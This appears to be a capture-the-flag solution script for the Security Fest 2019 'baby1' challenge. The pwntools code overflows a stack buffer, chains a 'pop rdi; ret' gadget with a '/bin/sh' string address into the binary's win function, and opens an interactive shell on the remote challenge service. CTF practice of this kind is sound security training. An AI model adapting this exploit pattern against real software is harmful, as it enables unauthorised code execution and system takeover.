Security Fest 2019 baby1

Baby2

from pwn import *
# Target: the remote challenge service. For a local run against the binary,
# use process('./baby1') in place of remote(...).
io = remote('baby-01.pwn.beer', 10001)
elf = ELF('./baby1')

# Address of a "/bin/sh" string found inside the binary image itself.
# NOTE: generator.next() is the Python 2 API, so this script targets a
# Python 2 pwntools install.
binsh = elf.search("/bin/sh").next()

# Hard-coded gadget address inside the binary. A fixed address only holds if
# the binary is loaded at a constant base (presumably built without PIE;
# confirm with checksec).
pop_rdi_ret = 0x0000000000400793  # pop rdi; ret


# Short aliases for the tube methods used below.
def ru(a):
    return io.recvuntil(a)


def sl(a):
    return io.sendline(a)


def sla(a, b):
    return io.sendlineafter(a, b)


def ex():
    return io.interactive()


# Overwrite layout, in the order it lands on the stack:
#   0x18 filler bytes  - presumably the distance from the start of the input
#                        buffer to the saved return address (verify in a
#                        debugger)
#   pop rdi; ret       - takes over the return address
#   &"/bin/sh"         - popped into rdi, the first-argument register in the
#                        x86-64 SysV calling convention
#   win                - next return target, entered with rdi = &"/bin/sh"
# The chain needs no stack-canary value, so the binary presumably has none on
# this path; a canary or a randomized image base would invalidate the
# hard-coded layout.
payload = "A" * 0x18 + p64(pop_rdi_ret) + p64(binsh) + p64(elf.symbols['win'])

# The line is sent before the prompt is consumed; the service reads it once it
# reaches its input call, and the prompt is drained afterwards.
sl(payload)
ru("input: ")
ex()
[Exploit Code]
